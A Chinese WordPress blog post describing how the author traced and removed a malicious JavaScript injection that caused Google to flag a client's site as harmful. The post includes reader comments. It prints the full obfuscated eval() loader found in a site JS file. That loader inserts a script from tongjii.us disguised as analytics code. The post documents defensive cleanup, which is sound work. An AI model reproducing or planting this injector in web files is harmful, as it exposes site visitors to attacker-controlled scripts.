记录一次解决“此网站可能会损害您的计算机”的方法

今天倡萌服务器维护的客户反馈说,网站存在安全问题,所有搜索结果都提示“此网站可能会损害您的计算机”:

0176-cmhello_com

在Chrome下正常访问出现如下提示:

0174-cmhello_com

这个问题是非常严重的,搜索引擎和浏览器直接封杀和提示,用户都不会访问,排名就更说不上了。

1.在google 的 Search Console 验证了网站,果然看到了“安全问题”:

0173-cmhello_com

2.直接查看网页源代码,一切貌似都正常;通过浏览器调试后才发现端倪,居然被挂js了,看到加载了来自 tongjii.us 这个域名下的js代码(很抱歉不记得截图了),由此可见,还是调试模式才可以找到问题所在。

3.知道被挂代码,但是到底是从哪里挂的?一开始还真的没思路,不过应该肯定是js文件无疑了。这个时候,可以手动在也加载的所有js文件代码中试着搜索 tongjii ,一般可以找到问题js。当然,倡萌在这里借助的是免费安全扫描工具 https://sitecheck.sucuri.net 找到问题所在:

0175-cmhello_com

从扫描结果可以看到存在问题的js文件路径,打开文件,果然发现恶意代码:

1
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('12(T(p,a,c,k,e,d){e=T(c){U(c<a?\'\':e(1f(c/a)))+((c=c%a)>1e?W.1d(c+1h):c.13(11))};X(!\'\'.V(/^/,W)){Y(c--){d[e(c)]=k[c]||e(c)}k=[T(e){U d[e]}];e=T(){U\'\\\\w+\'};c=1};Y(c--){X(k[c]){p=p.V(10 14(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}U p}(\'v(l(p,a,c,k,e,d){e=l(c){m c.n(z)};q(!\\\'\\\'.t(/^/,B)){r(c--){d[c.n(a)]=k[c]||c.n(a)}k=[l(e){m d[e]}];e=l(){m\\\'\\\\\\\\w+\\\'};c=1};r(c--){q(k[c]){p=p.t(C D(\\\'\\\\\\\\b\\\'+e(c)+\\\'\\\\\\\\b\\\',\\\'g\\\'),k[c])}}m p}(\\\'1 4=4||[];(b(){1 2=5.e(\\\\\\\'7\\\\\\\');2.a=\\\\\\\'8://9.d.f/k.6?//i.6?g\\\\\\\';1 3=5.j(\\\\\\\'7\\\\\\\')[0];3.h.c(2,3)})();\\\',o,o,\\\'|y|u|s|E|x|A|G|Q|N|P|l|R|S|O|L|M|F|H|I|K\\\'.J(\\\'|\\\'),0,{}))\',Z,Z,\'|||||||||||||||||||||T|U|13|17||X|Y||V|1m|12||1q|1r|11|1n|W|10|14|1l|1o|1c|1k|1i|15|1j|1s|1p|1g|19|18|16|1b|1a\'.15(\'|\'),0,{}))',62,91,'|||||||||||||||||||||||||||||||||||||||||||||||||||||||function|return|replace|String|if|while|55|new|36|eval|toString|RegExp|split|http|21|src|createElement|tongjii|insertBefore|script|fromCharCode|35|parseInt|lib|29|getElementsByTagName|tj|google|_hmt_en|hm_en|js|parentNode|41d12a21b4e1a726d4a651685b118811662033874|document|var|us'.split('|'),0,{}))

删除后重新上传,然后设置这个文件为只读。

处理完后,回到 Search Console 的安全问题页面,勾选“我已解决这些问题”,提交审核

支付宝打赏支付宝打赏 微信打赏微信打赏

如果文章对你有帮助,欢迎点击上方按钮打赏作者

最后编辑于:2017/7/14作者: 胡倡萌

一个疯狂的 WordPress 爱好者,喜欢折腾 WordPress 主题,分享 WordPress 资源。如果你也喜欢 WordPress,欢迎和我一起交流!

10 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注

arrow grin ! ? cool roll eek evil razz mrgreen smile oops lol mad twisted wink idea cry shock neutral sad ???

  1. 狂放说道:
    5#

    哈哈,我的站每周都要被被360强上

  2. 太原万达名品说道:
    4#

    :razz: 不错啊,早点知道这个网站就好了,我也可以扫扫自己的网站

  3. 匿名说道:
    3#

    冒昧请教一个问题,wordpress如何批量迁移图片到blogger呢,文章这些倒是好迁移,就是图片网上查了好久也找不到答案。blogger的图片不是绝对路径不像wordpress搬家换域名啥的替换网址就行了,完全不晓得怎么弄。只能一篇篇手动编辑替换吗?

    • 胡倡萌说道:

      不好意思,我没用过 blogger,不清楚。如果文章不多,手动弄下;如果文章非常多,建议找个主机或七牛、又拍云之类的服务,托管你之前的图片,然后批量替换下旧文章的图片链接

      • 匿名说道:

        嗯嗯,我也这样想过,怕这种图床又是blogger那种不是绝对路径的,每一张图片路径都不一样。所以没试,多谢解答!

        • 胡倡萌说道:

          话说,blogger在国内无法正常访问的,难不成你做博客是针对国外用户?

          • 匿名说道:

            我只是记录一些生活小知识 ,小教程,啥的。当作免费记事本而已,word,excel这种也不太方便记录和分类文章,那就blogger了,免费安全稳定还没广告自定义权限大,比自己搭建省时省心。如果想要国内访问就麻烦点,ping 谷歌没有被屏蔽的ip解析+绑个域名就可以实现国内访问,不过过段时间ip被屏蔽就要重新换ip。不过我看了一下好像还是有一些人这么干的,勤快点换ip应该没毛病。

  4. maqingxi说道:
    2#

    我用你推荐的免费安全扫描工具检测了一下,只发现一个过期软件版本提示,说我的 WordPress 没有升级到最新的的4.8,其他都正常。

  5. 胡歌网摘说道:
    1#

    治标不治本。这个文件只读了,其它还有很多文件可插代码。要找到入侵源头。

    • 胡倡萌说道:

      没错,需要找到源头。这次被修改的文件,是在我接手前修改的了,接收后在服务器方面的安全配置已经做好些了

扫一扫,用手机访问本站

扫一扫,用手机访问本站